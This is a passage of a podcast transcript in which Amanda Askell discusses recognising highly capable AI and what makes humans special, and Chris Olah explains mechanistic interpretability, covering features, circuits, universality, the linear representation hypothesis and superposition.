04:12:57.340 | from the models, that would be – and this is just going to feel iterative. It's one of those things
04:13:03.100 | where there's never – it's like people, I think, want there to be a moment, and I'm like, "I don't
04:13:10.060 | know." I think that there might just never be a moment. It might just be that there's just this
04:13:14.460 | continuous ramping up.
04:13:16.460 | I have a sense that there will be things that a model can say
04:13:20.460 | that convinces you this is very – it's not like – I've talked to people who are truly wise
04:13:32.940 | like you could just tell there's a lot of horsepower there.
04:13:36.220 | And if you 10x that, I don't know. I just feel like there's words you could say. Maybe ask it
04:13:41.980 | to generate a poem. And the poem it generates, you're like, "Yeah, okay. Whatever you did there,
04:13:49.900 | I don't think a human can do that."
04:13:51.420 | I think it has to be something that I can verify is actually really good though. That's why I think
04:13:56.220 | these questions that are like where I'm like, "Oh, this is like," sometimes it's just like I'll
04:14:01.820 | come up with a concrete counter example to an argument or something like that. I'm sure it would
04:14:07.260 | be like if you're a mathematician, you had a novel proof, I think, and you just gave it the problem,
04:14:11.580 | and you saw it, and you're like, "This proof is genuinely novel. No one has ever done – you
04:14:16.540 | actually have to do a lot of things to come up with this. I had to sit and think about it for
04:14:21.020 | months or something." And then if you saw the model successfully do that, I think you would
04:14:25.420 | just be like, "I can verify that this is correct." It is a sign that you have generalized from your
04:14:32.460 | training. You didn't just see this somewhere because I just came up with it myself, and you
04:14:36.220 | were able to replicate that. That's the kind of thing where I'm like, for me, the closer – the
04:14:43.660 | more that models can do things like that, the more I would be like, "Oh, this is very real,"
04:14:50.700 | because then I can – I don't know – I can verify that that's extremely capable.
04:14:55.740 | You've interacted with AI a lot. What do you think makes humans special?
04:14:59.340 | Oh, good question.
04:15:01.020 | Maybe in a way that the universe is much better off that we're in it,
04:15:09.100 | and that we should definitely survive and spread throughout the universe?
04:15:12.060 | Yeah, it's interesting because I think people focus so much on intelligence,
04:15:19.420 | especially with models. Intelligence is important because of what it does. It's very useful. It does
04:15:25.500 | a lot of things in the world. You can imagine a world where height or strength would have played
04:15:30.620 | this role. It's just a trait like that. It's not intrinsically valuable. It's valuable because of
04:15:36.940 | what it does, I think, for the most part. Personally, I think humans and life in general is
04:15:48.620 | extremely magical. To the degree that I – I don't know. Not everyone agrees with this. I'm
04:15:55.260 | flagging, but we have this whole universe, and there's all of these objects. There's beautiful
04:16:01.420 | stars, and there's galaxies, and then – I don't know. I'm just like, "On this planet,
04:16:05.580 | there are these creatures that have this ability to observe that, and they are seeing it. They are
04:16:13.740 | experiencing it." I imagine trying to explain to someone – for some reason, they've never encountered
04:16:21.820 | the world or science or anything. I think that nothing is that – everything, all of our physics
04:16:27.500 | and everything in the world is all extremely exciting, but then you say, "Oh, and plus,
04:16:31.420 | there's this thing that is to be a thing and observe in the world, and you see this inner
04:16:36.540 | cinema." I think they would be like, "Hang on. Wait. Pause. You just said something that is kind
04:16:41.980 | of wild sounding." I'm like, "We have this ability to experience the world. We feel pleasure. We feel
04:16:50.060 | suffering. We feel a lot of complex things." Maybe this is also why I think I also care a lot about
04:16:57.180 | animals, for example, because I think they probably share this with us. I think the things that make
04:17:03.500 | humans special, insofar as I care about humans, is probably more their ability to feel and experience
04:17:10.380 | than it is them having these functionally useful traits.
04:17:13.580 | LB: Yeah, to feel and experience the beauty in the world. Yeah, to look at the stars.
04:17:19.100 | I hope there's other alien civilizations out there, but if we're it, it's a pretty good thing.
04:17:27.500 | CM: And that they're having a good time.
04:17:28.940 | LB: They're having a good time watching us.
04:17:30.940 | CM: Yeah.
04:17:31.420 | LB: Well, thank you for this good time of a conversation and for the work you're doing
04:17:36.380 | and for helping make Claude a great conversational partner. And thank you for talking today.
04:17:42.780 | CM: Yeah, thanks for talking.
04:17:43.900 | LB: Thanks for listening to this conversation with Amanda Askell. And now, dear friends,
04:17:49.980 | here's Chris Ola. Can you describe this fascinating field of mechanistic interpretability,
04:17:57.820 | aka Mech Interp, the history of the field, and where it stands today?
04:18:01.900 | CM: I think one useful way to think about neural networks is that we don't program,
04:18:06.540 | we don't make them. We grow them. We have these neural network architectures that we design,
04:18:12.780 | and we have these loss objectives that we create. And the neural network architecture,
04:18:18.060 | it's kind of like a scaffold that the circuits grow on. And it starts off with some kind of
04:18:25.580 | random things, and it grows. And it's almost like the objective that we train for is this light.
04:18:31.820 | And so we create the scaffold that it grows on, and we create the light that it grows towards.
04:18:36.380 | But the thing that we actually create, it's this almost biological entity or organism
04:18:45.100 | that we're studying. And so it's very, very different from any kind of regular software
04:18:51.100 | engineering. Because at the end of the day, we end up with this artifact that can do all these
04:18:55.580 | amazing things. It can write essays and translate and understand images. It can do all these things
04:19:01.420 | that we have no idea how to directly create a computer program to do. And it can do that because
04:19:06.140 | we grew it. We didn't write it. We didn't create it. And so then that leaves open this question
04:19:12.060 | at the end, which is, what the hell is going on inside these systems? And that is, to me,
04:19:19.900 | a really deep and exciting question. It's a really exciting scientific question to me. It's
04:19:27.180 | sort of like the question that is just screaming out. It's calling out for us to go and answer it
04:19:32.220 | when we talk about neural networks. And I think it's also a very deep question for safety reasons.
04:19:36.540 | >> So mechanistic interpretability, I guess, is closer to maybe neurobiology?
04:19:41.660 | >> Yeah, yeah, I think that's right. So maybe to give an example of the kind of thing that has been
04:19:45.580 | done that I wouldn't consider to be mechanistic interpretability, there was for a long time a lot
04:19:49.340 | of work on saliency maps, where you would take an image and you'd try to say, the model thinks this
04:19:54.060 | image is a dog. What part of the image made it think that it's a dog? And that tells you maybe
04:20:00.220 | something about the model, if you can come up with a principled version of that. But it doesn't
04:20:04.700 | really tell you what algorithms are running in the model. How is the model actually making that
04:20:08.780 | decision? Maybe it's telling you something about what was important to it, if you can make that
04:20:12.380 | method work. But it isn't telling you what are the algorithms that are running? How is it that the
04:20:19.180 | system is able to do this thing that no one knew how to do? And so I guess we started using the
04:20:23.500 | term mechanistic interpretability to try to sort of draw that divide or to distinguish ourselves in
04:20:29.020 | the work that we were doing in some ways from some of these other things. And I think since then,
04:20:32.220 | it's become this sort of umbrella term for a pretty wide variety of work. But I'd say that
04:20:38.540 | the things that are kind of distinctive are, I think, A, this focus on we really want to get at
04:20:43.180 | the mechanisms, we want to get at the algorithms. If you think of neural networks as being like a
04:20:47.980 | computer program, then the weights are kind of like a binary computer program. And we'd like
04:20:53.260 | to reverse engineer those weights and figure out what algorithms are running. So, okay, I think one
04:20:57.100 | way you might think of trying to understand a neural network is that it's kind of like we have
04:21:00.780 | this compiled computer program and the weights of the neural network are the binary. And when the
04:21:06.940 | neural network runs, that's the activations. And our goal is ultimately to go and understand
04:21:12.540 | these weights. And so the project of mechanistic interpretability is to somehow figure out how do
04:21:17.100 | these weights correspond to algorithms. And in order to do that, you also have to understand
04:21:21.820 | the activations because the activations are like the memory. And if you imagine reverse
04:21:26.540 | engineering a computer program and you have the binary instructions, in order to understand what
04:21:32.060 | a particular instruction means, you need to know what is stored in the memory that it's operating
04:21:37.180 | on. And so those two things are very intertwined. So mechanistic interpretability tends to be
04:21:41.500 | interested in both of those things. Now, there's a lot of work that's interested in those things,
04:21:47.100 | especially there's all this work on probing, which you might see as part of being mechanistic
04:21:52.060 | interpretability, although it's, again, it's just a broad term and not everyone who does that work
04:21:55.980 | would identify as doing mechanistic interpretability. I think the thing that is maybe a little bit
04:22:00.220 | distinctive to the vibe of MechInterp is, I think people working in this space tend to think of
04:22:05.740 | neural networks as, well, maybe one way to say it is the gradient descent is smarter than you,
04:22:10.620 | that, you know, gradient descent is actually really great. The whole reason that we're
04:22:14.220 | understanding these models is because we didn't know how to write them in the first place. The
04:22:16.220 | gradient descent comes up with better solutions than us. And so I think that maybe another thing
04:22:20.460 | about MechInterp is sort of having almost a kind of humility that we won't guess a priori what's
04:22:25.740 | going on inside the model. And so we have to have the sort of bottom up approach where we don't
04:22:29.580 | really assume, you know, we don't assume that we should look for a particular thing and that will
04:22:32.860 | be there and that's how it works. But instead, we look for the bottom up and discover what happens
04:22:36.860 | to exist in these models and study them that way. LR: But, you know, the very fact that it's
04:22:41.980 | possible to do, and as you and others have shown over time, you know, things like universality,
04:22:48.300 | that the wisdom of the gradient descent creates features and circuits, creates things universally
04:22:57.260 | across different kinds of networks that are useful. And that makes the whole field possible.
04:23:02.220 | CM: Yeah. So this is actually, is indeed a really remarkable and exciting thing where it does seem
04:23:07.100 | like, at least to some extent, you know, the same elements, the same features and circuits
04:23:14.380 | form again and again. You know, you can look at every vision model and you'll find curve detectors
04:23:18.060 | and you'll find high-low frequency detectors. And in fact, there's some reason to think that the
04:23:22.060 | same things form across, you know, biological neural networks and artificial neural networks.
04:23:27.100 | So a famous example is vision models in the early layers. They have Gabor filters and there's,
04:23:31.980 | you know, Gabor filters are something that neuroscientists are interested in and have
04:23:34.700 | thought a lot about. We find curve detectors in these models. Curve detectors are also found in
04:23:38.380 | monkeys. We discover these high-low frequency detectors and then some follow-up work went and
04:23:43.100 | discovered them in rats or mice. So they were found first in artificial neural networks and
04:23:48.220 | then found in biological neural networks. You know, there's this really famous result on, like,
04:23:52.060 | grandmother neurons or the Haley-Berry neuron from Quiroga et al. And we found very similar
04:23:57.180 | things in vision models where, as well, I was still at OpenAI and I was looking at their CLIP
04:24:01.900 | model. And you find these neurons that respond to the same entities in images. And also to give a
04:24:08.460 | concrete example there, we found that there was a Donald Trump neuron. For some reason, I guess,
04:24:11.580 | everyone likes to talk about Donald Trump and Donald Trump was very prominent. It was a very
04:24:16.140 | hot topic at that time. So every neural network we looked at, we would find a dedicated neuron
04:24:20.140 | for Donald Trump. And that was the only person who had always had a dedicated neuron. You know,
04:24:25.900 | sometimes you'd have an Obama neuron, sometimes you'd have a Clinton neuron, but Trump always
04:24:29.980 | had a dedicated neuron. So it responds to, you know, pictures of his face and the word Trump,
04:24:35.820 | like all these things, right? And so it's not responding to a particular example or, like,
04:24:41.020 | it's not just responding to his face, it's abstracting over this general concept, right?
04:24:45.500 | So in any case, that's very similar to these Quiroga et al results. So there's evidence that
04:24:49.260 | this phenomenon of universality, the same things form across both artificial and natural neural
04:24:55.020 | networks. That's a pretty amazing thing if that's true. You know, it suggests that, well, I think
04:25:00.460 | the thing that it suggests is the gradient descent is sort of finding, you know, the right ways to
04:25:05.420 | cut things apart in some sense that many systems converge on and many different neural networks
04:25:10.300 | architectures converge on. There's some natural set of, you know, there's some set of abstractions
04:25:15.260 | that are a very natural way to cut apart the problem and that a lot of systems are going to
04:25:18.300 | converge on. That would be my kind of, you know, I don't know anything about neuroscience. This is
04:25:23.420 | just my kind of wild speculation from what we've seen. Yeah, that would be beautiful if it's sort
04:25:28.380 | of agnostic to the medium of the model that's used to form the representation. Yeah, yeah. And it's,
04:25:36.140 | you know, it's a kind of a wild speculation based, you know, we only have a few data points
04:25:42.300 | that suggest this, but, you know, it does seem like there's some sense in which the same things
04:25:47.100 | form again and again and again and again, both in certainly in natural neural networks and also
04:25:51.340 | artificially or in biology. And the intuition behind that would be that, you know, in order
04:25:56.700 | to be useful in understanding the real world, you need all the same kind of stuff. Yeah, well,
04:26:02.060 | if we pick, I don't know, like the idea of a dog, right? Like, you know, there's some sense in which
04:26:05.820 | the idea of a dog is like a natural category in the universe or something like this, right? Like,
04:26:11.900 | you know, there's some reason, it's not just like a weird quirk of like how humans factor, you know,
04:26:18.140 | think about the world that we have this concept of a dog. It's in some sense, or like if you have
04:26:22.700 | the idea of a line, like there's, you know, like look around us, you know, there are lines, you
04:26:27.580 | know, it's sort of the simplest way to understand this room in some sense is to have the idea of a
04:26:31.820 | line. And so, I think that would be my instinct for why this happens. Yeah, you need a curved
04:26:37.660 | line, you know, to understand a circle and you need all those shapes to understand bigger things.
04:26:41.900 | And yeah, it's a hierarchy of concepts that are formed. Yeah. And like maybe there are ways to go
04:26:45.740 | and describe, you know, images without reference to those things, right? But they're not the
04:26:48.700 | simplest way or the most economical way or something like this. And so systems converge
04:26:52.700 | to these strategies would be my wild, wild hypothesis. Can you talk through some of the
04:26:58.300 | building blocks that we've been referencing of features and circuits? So I think you first
04:27:03.340 | described them in a 2020 paper, Zoom In, An Introduction to Circuits. Absolutely. So maybe
04:27:10.700 | I'll start by just describing some phenomena, and then we can sort of build to the idea of
04:27:16.380 | features and circuits. If you spent like quite a few years, maybe like five years to some extent,
04:27:24.460 | with other things, studying this one particular model, Inception V1, which is this one vision
04:27:28.780 | model. It was state-of-the-art in 2015. And, you know, very much not state-of-the-art anymore.
04:27:35.420 | And it has, you know, maybe about 10,000 neurons. And I spent a lot of time looking at the 10,000
04:27:41.820 | neurons, odd neurons of Inception V1. And one of the interesting things is, you know,
04:27:49.340 | there are lots of neurons that don't have some obvious integral meaning, but there's a lot of
04:27:53.260 | neurons in Inception V1 that do have really clean integral meanings. So you find neurons that just
04:28:00.380 | really do seem to detect curves, and you find neurons that really do seem to detect cars, and
04:28:05.020 | car wheels, and car windows, and, you know, floppy ears of dogs, and dogs with long snouts
04:28:10.940 | facing to the right, and dogs with long snouts facing to the left, and, you know, different
04:28:14.540 | kinds of fur. And there's sort of this whole beautiful edge detectors, line detectors,
04:28:18.700 | color contrast detectors, these beautiful things we call high-low frequency detectors.
04:28:22.620 | You know, I think looking at it, I sort of felt like a biologist. You know, you're looking at
04:28:26.860 | this sort of new world of proteins, and you're discovering all these different proteins that
04:28:31.100 | interact. So one way you could try to understand these models is in terms of neurons. You could
04:28:37.580 | try to be like, "Oh, you know, there's a dog-detecting neuron, and here's a car-detecting
04:28:41.340 | neuron." And it turns out you can actually ask how those connect together. So you can go and say,
04:28:45.020 | "Oh, you know, I have this car-detecting neuron. How was it built?" And it turns out, in the
04:28:48.220 | previous layer, it's connected really strongly to a window detector, and a wheel detector,
04:28:52.060 | and a sort of car body detector. And it looks for the window above the car, and the wheels below,
04:28:56.540 | and the car chrome sort of in the middle, sort of everywhere, but especially in the lower part.
04:28:59.740 | And that's sort of a recipe for a car. Like that is, you know, earlier we said the thing we wanted
04:29:05.740 | from MechAnterp was to get algorithms, to go and get, you know, ask, "What is the algorithm that
04:29:09.660 | runs?" Well, here, we're just looking at the weights of the neural network, and we're reading
04:29:12.300 | off this kind of recipe for detecting cars. It's a very simple crude recipe, but it's there.
04:29:17.660 | And so we call that a circuit, this connection. Well, okay. So the problem is that not all of the
04:29:23.820 | neurons are interpretable. And there's reason to think, and we can get into this more later,
04:29:29.580 | that there's this superposition hypothesis. There's reason to think that sometimes the right
04:29:34.060 | unit to analyze things in terms of is combinations of neurons. So sometimes it's not that there's a
04:29:40.380 | single neuron that represents, say, a car, but it actually turns out after you detect the car,
04:29:45.100 | the model sort of hides a little bit of the car in the following layer and a bunch of dog detectors.
04:29:50.300 | Why is it doing that? Well, you know, maybe it just doesn't want to do that much work on
04:29:53.580 | cars at that point, and, you know, it's sort of storing it away to go and...
04:29:57.740 | So it turns out then that the sort of subtle pattern of, you know, there's all these neurons
04:30:03.020 | that you think are dog detectors, and maybe they're primarily that, but they all a little
04:30:06.860 | bit contribute to representing a car in that next layer. Okay, so now we can't really think...
04:30:11.980 | There might still be something, I don't know, you could call it like a car concept or something,
04:30:16.380 | but it no longer corresponds to a neuron. So we need some term for these kind of neuron-like
04:30:21.740 | entities, these things that we sort of would have liked the neurons to be, these idealized neurons,
04:30:25.180 | the things that are the nice neurons, but also maybe there's more of them somehow hidden,
04:30:29.420 | and we call those features. And then what are circuits? So circuits are these connections
04:30:34.460 | of features, right? So when we have the car detector, and it's connected to a window detector
04:30:40.140 | and a wheel detector, and it looks for the wheels below and the windows on top, that's a circuit.
04:30:45.500 | So circuits are just collections of features connected by weights, and they implement
04:30:50.140 | algorithms. So they tell us, you know, how are features used? How are they built? How do they
04:30:55.180 | connect together? So maybe it's worth trying to pin down, like, what really is the core hypothesis
04:31:01.900 | here? And I think the core hypothesis is something we call the linear representation hypothesis.
04:31:06.460 | So if we think about the car detector, you know, the more it fires, the more we sort of think of
04:31:11.260 | that as meaning, oh, the model is more and more confident that a car is present. Or, you know,
04:31:17.820 | if there's some combination of neurons that represent a car, you know, the more that combination
04:31:21.260 | fires, the more we think the model thinks there's a car present. This doesn't have to be the case,
04:31:27.500 | right? Like you could imagine something where you have, you know, you have this car detector neuron,
04:31:31.660 | and you think, ah, you know, if it fires, like, you know, between one and two, that means one
04:31:36.540 | thing, but it means, like, totally different if it's between three and four. That would be a
04:31:40.380 | nonlinear representation. And in principle, that, you know, models could do that. I think it's sort
04:31:44.860 | of inefficient for them to do. If you try to think about how you'd implement computation like that,
04:31:48.700 | it's kind of an annoying thing to do. But in principle, models can do that.
04:31:51.340 | So one way to think about the features and circuits sort of framework for thinking about
04:31:58.700 | things is that we're thinking about things as being linear. We're thinking about there as being,
04:32:02.460 | that if a neuron or a combination of neurons fires more, it sort of, that means more of a
04:32:07.660 | particular thing being detected. And then that gives weights a very clean interpretation as
04:32:12.220 | these edges between these entities, these features, and that edge then has a meaner.
04:32:18.860 | So that's, in some ways, the core thing. It's like, you know, we can talk about this sort of
04:32:26.300 | outside the context of neurons. Are you familiar with the word2vec results? So you have like,
04:32:30.700 | you know, king minus man plus woman equals queen. Well, the reason you can do that kind
04:32:34.860 | of arithmetic is because you have a linear representation. - Can you actually explain
04:32:39.180 | that representation a little bit? So first off, so the feature is a direction of activation.
04:32:44.060 | - Yeah, exactly. - You can think of it that way.
04:32:45.340 | Can you do the minus men plus women, that, the word2vec stuff, can you explain what that is?
04:32:51.900 | - Yeah, so there's this very- - It's such a simple,
04:32:54.380 | clean explanation of what we're talking about. - Exactly, yeah. So there's this very famous result,
04:32:58.860 | word2vec by Thomas Mikhailov et al. And there's been tons of follow-up work exploring this.
04:33:03.420 | See, so sometimes we have these, we create these word embeddings, where we map every word
04:33:10.860 | to a vector. I mean, that in itself, by the way, is kind of a crazy thing if you haven't thought
04:33:14.620 | about it before, right? Like we're going in and representing, we're turning, you know, like,
04:33:20.460 | like if you just learned about vectors in physics class, right? And I'm like, oh, I'm going to
04:33:23.980 | actually turn every word in the dictionary into a vector. That's kind of a crazy idea. Okay. But
04:33:29.020 | you could imagine, you could imagine all kinds of ways in which you might map words to vectors.
04:33:34.140 | But it seems like when we train neural networks, they like to go and map words to vectors
04:33:41.180 | to such that they're sort of linear structure in a particular sense,
04:33:46.140 | which is that directions have meaning. So for instance, if you, there will be some direction
04:33:52.060 | that seems to sort of correspond to gender, and male words will be, you know, far in one direction,
04:33:56.380 | and female words will be in another direction. And the linear representation hypothesis is,
04:34:01.660 | you could sort of think of it roughly as saying that that's actually kind of the
04:34:04.940 | fundamental thing that's going on, that everything is just different directions have meanings,
04:34:09.900 | and adding different direction vectors together can represent concepts. And the Mikhailov paper
04:34:15.660 | sort of took that idea seriously. And one consequence of it is that you can, you can
04:34:19.580 | do this game of playing sort of arithmetic with words. So you can do king and you can,
04:34:23.660 | you know, subtract off the word man and add the word woman. And so you're sort of,
04:34:27.420 | you know, going and trying to switch the gender. And indeed, if you do that,
04:34:30.620 | the result will sort of be close to the word queen. And you can, you know, do other things
04:34:34.780 | like you can do, you know, sushi minus Japan plus Italy and get pizza or different things like this,
04:34:42.540 | right? So this is in some sense, the core of the linear representation hypothesis. You can
04:34:47.900 | describe it just as a purely abstract thing about vector spaces, you can describe it as a statement
04:34:52.300 | about the activations of neurons. But it's really about this property of directions having meaning.
04:34:59.660 | And in some ways, it's even a little subtle than that. It's really, I think, mostly about this
04:35:03.420 | property of being able to add things together, that you can sort of independently modify,
04:35:08.460 | say, gender and royalty or, you know, cuisine type or country and the concept of food by
04:35:17.580 | adding them. Do you think the linear hypothesis holds that carries scales?
04:35:23.100 | So, so far, I think everything I have seen is consistent with this hypothesis. And it doesn't
04:35:28.220 | have to be that way, right? Like, like, you can write down neural networks, where you write weights
04:35:33.260 | such that they don't have linear representations, where the right way to understand them is not,
04:35:37.580 | is not in terms of linear representations. But I think every natural neural network I've seen
04:35:42.700 | has this property. There's been one paper recently, that there's been some sort of pushing
04:35:50.220 | around the edge. So I think there's been some work recently studying multi-dimensional features,
04:35:53.900 | where rather than a single direction, it's more like a manifold of directions. This to me still
04:35:59.820 | seems like a linear representation. And then there's been some other papers suggesting that
04:36:04.300 | maybe in very small models, you get nonlinear representations. I think that the jury's still
04:36:10.780 | out on that. But I think everything that we've seen so far has been consistent with the linear
04:36:16.140 | representation hypothesis. And that's wild. It doesn't have to be that way. And yet, I think
04:36:21.580 | there's a lot of evidence that certainly at least this is very, very widespread. And so far, the
04:36:26.300 | evidence is consistent with it. And I think, you know, one thing you might say is you might say,
04:36:30.780 | well, Christopher, you know, that's a lot, you know, to go and sort of write on, you know,
04:36:35.980 | if we don't know for sure this is true, and you're sort of, you know, you're investing in neural
04:36:39.420 | networks as though it is true, you know, isn't that, isn't that interesting? Well, you know,
04:36:43.260 | but I think actually, there's a virtue in taking hypotheses seriously and pushing them as far as
04:36:48.940 | they can go. So it might be that someday we discover something that isn't consistent with
04:36:53.660 | linear representation hypothesis. But science is full of hypotheses and theories that were wrong.
04:36:58.300 | And we learned a lot by sort of working under them as a sort of an assumption. And then going
04:37:05.740 | and pushing them as far as we can, I guess, I guess this is sort of the heart of what Kuhn would
04:37:09.020 | call normal science. I don't know, if you want, we can talk a lot about philosophy of science.
04:37:15.580 | - That leads to the paradigm shift. So yeah, I love it taking the hypothesis seriously and
04:37:20.700 | take it to a natural conclusion. Same with the scaling hypothesis, same.
04:37:24.700 | - Exactly, exactly. And one of my colleagues, Tom Hennigan, who is a former physicist,
04:37:31.980 | made this really nice analogy to me of caloric theory, where, you know, once upon a time,
04:37:38.300 | we thought that heat was actually, you know, this thing called caloric. And like the reason,
04:37:43.020 | you know, hot objects, you know, would warm up cool objects is like the caloric is flowing through
04:37:47.740 | them. And like, you know, because we're so used to thinking about heat, you know, in terms of
04:37:52.940 | the modern and modern theory, you know, that seems kind of silly, but it's actually very hard to
04:37:56.860 | construct an experiment that sort of disproves the caloric hypothesis. And, you know, you can
04:38:03.820 | actually do a lot of really useful work believing in caloric. For example, it turns out that the
04:38:08.700 | original combustion engines were developed by people who believed in the caloric theory.
04:38:12.860 | So I think there's a virtue in taking hypotheses seriously, even when they might be wrong.
04:38:17.260 | - Yeah, there's a deep philosophical truth to that. That's kind of how I feel about space travel,
04:38:23.580 | like colonizing Mars. There's a lot of people that criticize that. I think if you just assume
04:38:27.980 | we have to colonize Mars in order to have a backup for human civilization, even if that's not true,
04:38:33.420 | that's going to produce some interesting engineering and even scientific breakthroughs,
04:38:38.540 | I think. - Yeah, well, and actually,
04:38:39.980 | this is another thing that I think is really interesting. So, you know, there's a way in
04:38:44.540 | which I think it can be really useful for society to have people almost irrationally dedicated to
04:38:52.220 | investigating particular hypotheses. Because, well, it takes a lot to sort of maintain scientific
04:38:58.940 | morale and really push on something when, you know, most scientific hypotheses end up being
04:39:03.820 | wrong. You know, a lot of science doesn't work out. And yet, it's very useful to go, you know,
04:39:11.820 | there's a joke about Geoff Hinton, which is that Geoff Hinton has discovered how the brain works
04:39:17.740 | every year for the last 50 years. But, you know, I say that with like, you know, with really deep
04:39:25.020 | respect because in fact, that's actually, you know, that led to him doing some really great work.
04:39:29.260 | - Yeah, he won the Nobel Prize now, who's laughing now.
04:39:31.820 | - Exactly, exactly. I think one wants to be able to pop up and sort of recognize
04:39:37.260 | the appropriate level of confidence. But I think there's also a lot of value in just being like,
04:39:41.500 | you know, I'm going to essentially assume, I'm going to condition on this problem being
04:39:46.540 | possible or this being broadly the right approach. And I'm just going to go and assume that for a
04:39:51.260 | while and go and work within that and push really hard on it. And, you know, if society has lots of
04:39:58.140 | people doing that for different things, that's actually really useful in terms of going and
04:40:02.940 | getting to, you know, either really ruling things out, right? We can be like, well,
04:40:10.540 | you know, that didn't work and we know that somebody tried hard. Or going and getting to
04:40:14.540 | something that it does teach us something about the world.
04:40:16.620 | - So another interesting hypothesis is the superposition hypothesis.
04:40:20.380 | Can you describe what superposition is?
04:40:22.060 | - Yeah. So earlier we were talking about word divac, right? And we were talking about how,
04:40:25.420 | you know, maybe you have one direction that corresponds to gender and maybe another that
04:40:28.940 | corresponds to royalty and another one that corresponds to Italy and another one that
04:40:32.700 | corresponds to, you know, food and all of these things. Well, you know, oftentimes maybe these
04:40:37.820 | word embeddings, they might be 500 dimensions, a thousand dimensions. And so if you believe that
04:40:44.060 | all of those directions were orthogonal, then you could only have, you know, 500 concepts. And,
04:40:50.220 | you know, I love pizza. But, like, if I was going to go and, like, give the, like, 500
04:40:55.020 | most important concepts in, you know, the English language, probably Italy wouldn't be -- it's not
04:41:00.860 | obvious at least that Italy would be one of them, right? Because you have to have things like plural
04:41:04.540 | and singular and verb and noun and adjective. And, you know, there's a lot of things we have
04:41:11.980 | to get to before we get to Italy and Japan. And, you know, there's a lot of countries in the world.
04:41:17.420 | And so how might it be that models could, you know, simultaneously have the linear
04:41:24.060 | representation hypothesis be true and also represent more things than they have directions?
04:41:30.060 | So what does that mean? Well, okay. So if linear representation hypothesis is true,
04:41:33.980 | something interesting has to be going on. Now, I'll tell you one more interesting thing before
04:41:38.540 | we go and we do that, which is, you know, earlier we were talking about all these polysematic
04:41:43.420 | neurons, right? These neurons that, you know, when we were looking at Inception V1, there's
04:41:47.260 | these nice neurons that, like, the car detector and the curve detector and so on that respond to
04:41:51.020 | lots of, you know, to very coherent things. But it's lots of neurons that respond to a bunch of
04:41:55.100 | unrelated things. And that's also an interesting phenomenon. And it turns out as well that even
04:42:00.220 | these neurons that are really, really clean, if you look at the weak activations, right? So if you
04:42:03.980 | look at, like, you know, the activations where it's, like, activating 5% of the, you know, of
04:42:10.140 | the maximum activation, it's really not the core thing that it's expecting, right? So if you look
04:42:14.380 | at a curve detector, for instance, and you look at the places where it's 5% active, you know,
04:42:19.100 | you could interpret it just as noise, or it could be that it's doing something else there.
04:42:23.100 | Okay. So how could that be? Well, there's this amazing thing in mathematics called compressed
04:42:31.740 | sensing. And it's actually this very surprising fact where if you have a high-dimensional space
04:42:37.740 | and you project it into a low-dimensional space, ordinarily, you can't go and sort of unproject it
04:42:44.380 | and get back your high-dimensional vector, right? You threw information away. This is like,
04:42:47.500 | you know, you can't invert a rectangular matrix. You can only invert square matrices.
04:42:52.620 | But it turns out that that's actually not quite true. If I tell you that the high-dimensional
04:42:59.580 | vector was sparse, so it's mostly zeros, then it turns out that you can often go and find
04:43:04.780 | back the high-dimensional vector with very high probability. So that's a surprising fact,
04:43:13.180 | right? It says that, you know, you can have this high-dimensional vector space, and as long as
04:43:17.660 | things are sparse, you can project it down, you can have a lower-dimensional projection of it,
04:43:22.620 | and that works. So the superposition hypothesis is saying that that's what's going on in neural
04:43:27.900 | networks. For instance, that's what's going on in word embeddings, that word embeddings are able
04:43:31.740 | to simultaneously have directions be the meaningful thing, and by exploiting the fact that they're
04:43:36.620 | operating on a fairly high-dimensional space, they're actually -- and the fact that these
04:43:40.300 | concepts are sparse, right? Like, you know, you usually aren't talking about Japan and Italy at
04:43:44.220 | the same time. You know, most of those concepts, you know, in most sentences, Japan and Italy are
04:43:49.100 | both zero. They're not present at all. And if that's true, then you can go and have it be the
04:43:56.060 | case that you can have many more of these sort of directions that are meaningful, these features,
04:44:03.020 | than you have dimensions. And similarly, when we're talking about neurons, you can have many
04:44:06.540 | more concepts than you have neurons. So that's the high-level superposition hypothesis.
04:44:11.980 | Now, it has this even wilder implication, which is to go and say that neural networks are -- it
04:44:21.820 | may not just be the case that the representations are like this, but the computation may also be
04:44:25.980 | like this. You know, the connections between all of them. And so, in some sense, neural networks
04:44:30.060 | may be shadows of much larger, sparser neural networks. And what we see are these projections.
04:44:37.180 | And the super -- you know, the strongest version of the superposition hypothesis would be to take
04:44:41.100 | that really seriously and sort of say, you know, there actually is, in some sense, this upstairs
04:44:45.660 | model, this, you know, where the neurons are really sparse and all-interpol, and there's,
04:44:50.700 | you know, the weights between them are these really sparse circuits. And that's what we're
04:44:55.100 | studying. And the thing that we're observing is the shadow of it, and so we need to find
04:45:01.580 | the original object. >> And the process of learning is trying to construct a compression
04:45:07.420 | of the upstairs model that doesn't lose too much information in the projection.
04:45:11.420 | >> Yeah, it's finding how to fit it efficiently, or something like this. The gradient descent is
04:45:15.900 | doing this. And in fact, so this sort of says that gradient descent, you know, it could just
04:45:19.820 | represent a dense neural network, but it sort of says that gradient descent is implicitly searching
04:45:23.420 | over the space of extremely sparse models that could be projected into this low-dimensional space.
04:45:28.860 | And this large body of work of people going and trying to study sparse neural networks,
04:45:33.340 | right, where you go and you have -- you could design neural networks, right, where the edges
04:45:36.700 | are sparse and the activations are sparse. And, you know, my sense is that work has generally -- it
04:45:41.580 | feels very principled, right? It makes so much sense. And yet, that work hasn't really panned
04:45:45.980 | out that well, is my impression, broadly. And I think that a potential answer for that is that
04:45:52.060 | actually, the neural network is already sparse in some sense. Gradient descent was the whole time,
04:45:57.500 | gradient -- you were trying to go and do this. Gradient descent was actually in the -- behind
04:46:00.300 | the scenes going and searching more efficiently than you could through the space of sparse models,
04:46:04.300 | and going and learning whatever sparse model was most efficient, and then figuring out how
04:46:08.780 | to fold it down nicely to go and run conveniently on your GPU, which does, you know, nice dense
04:46:13.260 | matrix multiplies, and that you just can't beat that. >> How many concepts do you think can be
04:46:18.540 | shoved into a neural network? >> Depends on how sparse they are. So, there's probably an upper
04:46:23.100 | bound from the number of parameters, right? Because you have to have -- you still have to have,
04:46:27.020 | you know, weights that go and connect them together. So, that's one upper bound. There are,
04:46:32.540 | in fact, all these lovely results from compressed sensing, and the Johnson-Lindenstrauss lemma,
04:46:36.940 | and things like this, that they basically tell you that if you have a vector space, and you want to
04:46:42.300 | have almost orthogonal vectors, which is sort of probably the thing that you want here, right? So,
04:46:46.780 | you're going to say, well, you know, I'm going to give up on having my concepts, my features be
04:46:50.540 | strictly orthogonal, but I'd like them to not interfere that much. I'm going to ask them to
04:46:53.980 | be almost orthogonal. Then this would say that it's actually, you know, for once you set a
